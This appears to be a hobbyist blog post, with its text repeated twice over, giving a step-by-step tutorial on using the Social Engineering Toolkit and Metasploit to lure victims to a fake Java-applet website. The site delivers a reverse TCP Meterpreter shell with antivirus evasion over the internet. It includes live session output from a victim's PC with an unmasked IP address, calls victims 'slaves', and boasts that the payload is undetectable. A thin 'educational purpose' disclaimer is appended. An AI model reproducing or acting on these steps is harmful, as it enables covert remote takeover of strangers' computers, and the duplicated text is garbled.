Today i m gonna tell u about hacking outside the
the lan.
Requirements:
1.) SET (Social Engineering Toolkit)
2.) Metasploit
3.) Port Forwarded router
4.) Patients
*Note I will not be providing Pics/Downloads for any of these find them yourself with the search bar or google or get Backtrack 5, I will also not show how to port forward you can find that on another tutorial on this vast website.
Ok so here we go!
Step One:
Open up SET
Step Two: Choosing what to use.
Today for this Tutorial we will be using Social-Engineering Attacks which in the SET terminal is option 1.
Step Three: What Social attack to use?
Now that you have done step two we need to choose how we will hack our slave so we will use Website Attack Vectors which is option 2.
Step Four: How will we deliver our payload?
We will need to use something that the victim will think is a normal thing when surfing so we are going to be using Java Applet Attack Method which is option 1.
Step Five: Website.
Today for simple reasons we will just use a web template option 1 and for our java attack method we will use a java required webpage again option 1.
Step Six: What payload to use?
Well to get a shell we want to use Windows Reverse_TCP Meterpreter which is option 2.
Step Seven: Bypassing AV.
Choose Backdoored Executable which is option 16 because it misleads the AV the most and is the best to use!
Step Eight: PORT of the listener (Has to be port forwarded if not done already)
You can use default (443) or use your own but today I will be using the port 4444 for the listener.
Step Nine: Changing LHOST to allow you to hack off LAN!
Now you may see that LHOST is 0.0.0.0 and LPORT Is 4444 Now we just need to change the LHOST and leave LPORT the same. So to do this go to http://www.whatismyip.com/ copy the IP address and in the terminal put "set LHOST (IP Address From whatismyip.com)" without the brackets or "" at the start or end. Now once that is done you can see if it is up at http://www.downforeveryoneorjustme.com/ and to check its ports go to http://canyouseeme.org/ and if the site is up and the port you used are open then you are now able to hack peoples computer who visit your website and run the Java! Here was a test done to a slave PC off LAN.
[*] Sending stage (752128 bytes) to 87.147.130.27
[*] Meterpreter session 1 opened (**.***.***.***:4444 -> 87.147.130.27:49519) at Thu Dec 08 17:01:00 -0500 2011
[*] Sending stage (752128 bytes) to 87.147.130.27
[*] Meterpreter session 2 opened (**.***.***.***:4444 -> 87.147.130.27:49520) at Thu Dec 08 17:01:18 -0500 2011
sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 Jason-PC\Jason @ Jason-PC **.***.***.***:4444 -> 87.147.130.27:49519
2 meterpreter x86/win32 Jason-PC\Jason @ Jason-PC **.***.***.***:4444 -> 87.147.130.27:49
*Note 87.147.130.27 is the Slaves IP/PC And **.***.***.*** is my hidden IP. If all worked like this you should have a connection to do what you like on the Slaves PC until the shut down! Need help with any steps leave a message below on this thread and I will be happy to respond to it! I do not read PM's.
Happy Hacking!
I would also like to add that when scanning the website with Virus Total it was all 100% Clean and the downloaded payload was also undetectable for any sort of virus!
REMEMBER :-
(it would be better if u use backtrack
in dual boot mode with windows or singly booted rather to use it in vmware )
AND
REMEMBER I WILL NOT BE RESPONSIBLE FOR YOUR ATTEMPTS TO USED
IT IN EVIL THING THIS IS JUST FOR THE EDUCATIONAL PURPOSE .
SEE THIS TO CLEAR YOUR DOUBT:-
the lan.
Requirements:
1.) SET (Social Engineering Toolkit)
2.) Metasploit
3.) Port Forwarded router
4.) Patients
*Note I will not be providing Pics/Downloads for any of these find them yourself with the search bar or google or get Backtrack 5, I will also not show how to port forward you can find that on another tutorial on this vast website.
Ok so here we go!
Step One:
Open up SET
Step Two: Choosing what to use.
Today for this Tutorial we will be using Social-Engineering Attacks which in the SET terminal is option 1.
Step Three: What Social attack to use?
Now that you have done step two we need to choose how we will hack our slave so we will use Website Attack Vectors which is option 2.
Step Four: How will we deliver our payload?
We will need to use something that the victim will think is a normal thing when surfing so we are going to be using Java Applet Attack Method which is option 1.
Step Five: Website.
Today for simple reasons we will just use a web template option 1 and for our java attack method we will use a java required webpage again option 1.
Step Six: What payload to use?
Well to get a shell we want to use Windows Reverse_TCP Meterpreter which is option 2.
Step Seven: Bypassing AV.
Choose Backdoored Executable which is option 16 because it misleads the AV the most and is the best to use!
Step Eight: PORT of the listener (Has to be port forwarded if not done already)
You can use default (443) or use your own but today I will be using the port 4444 for the listener.
Step Nine: Changing LHOST to allow you to hack off LAN!
Now you may see that LHOST is 0.0.0.0 and LPORT Is 4444 Now we just need to change the LHOST and leave LPORT the same. So to do this go to http://www.whatismyip.com/ copy the IP address and in the terminal put "set LHOST (IP Address From whatismyip.com)" without the brackets or "" at the start or end. Now once that is done you can see if it is up at http://www.downforeveryoneorjustme.com/ and to check its ports go to http://canyouseeme.org/ and if the site is up and the port you used are open then you are now able to hack peoples computer who visit your website and run the Java! Here was a test done to a slave PC off LAN.
[*] Sending stage (752128 bytes) to 87.147.130.27
[*] Meterpreter session 1 opened (**.***.***.***:4444 -> 87.147.130.27:49519) at Thu Dec 08 17:01:00 -0500 2011
[*] Sending stage (752128 bytes) to 87.147.130.27
[*] Meterpreter session 2 opened (**.***.***.***:4444 -> 87.147.130.27:49520) at Thu Dec 08 17:01:18 -0500 2011
sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 Jason-PC\Jason @ Jason-PC **.***.***.***:4444 -> 87.147.130.27:49519
2 meterpreter x86/win32 Jason-PC\Jason @ Jason-PC **.***.***.***:4444 -> 87.147.130.27:49
*Note 87.147.130.27 is the Slaves IP/PC And **.***.***.*** is my hidden IP. If all worked like this you should have a connection to do what you like on the Slaves PC until the shut down! Need help with any steps leave a message below on this thread and I will be happy to respond to it! I do not read PM's.
Happy Hacking!
I would also like to add that when scanning the website with Virus Total it was all 100% Clean and the downloaded payload was also undetectable for any sort of virus!
REMEMBER :-
(it would be better if u use backtrack
in dual boot mode with windows or singly booted rather to use it in vmware )
AND
REMEMBER I WILL NOT BE RESPONSIBLE FOR YOUR ATTEMPTS TO USED
IT IN EVIL THING THIS IS JUST FOR THE EDUCATIONAL PURPOSE .
SEE THIS TO CLEAR YOUR DOUBT:-
No comments:
Post a Comment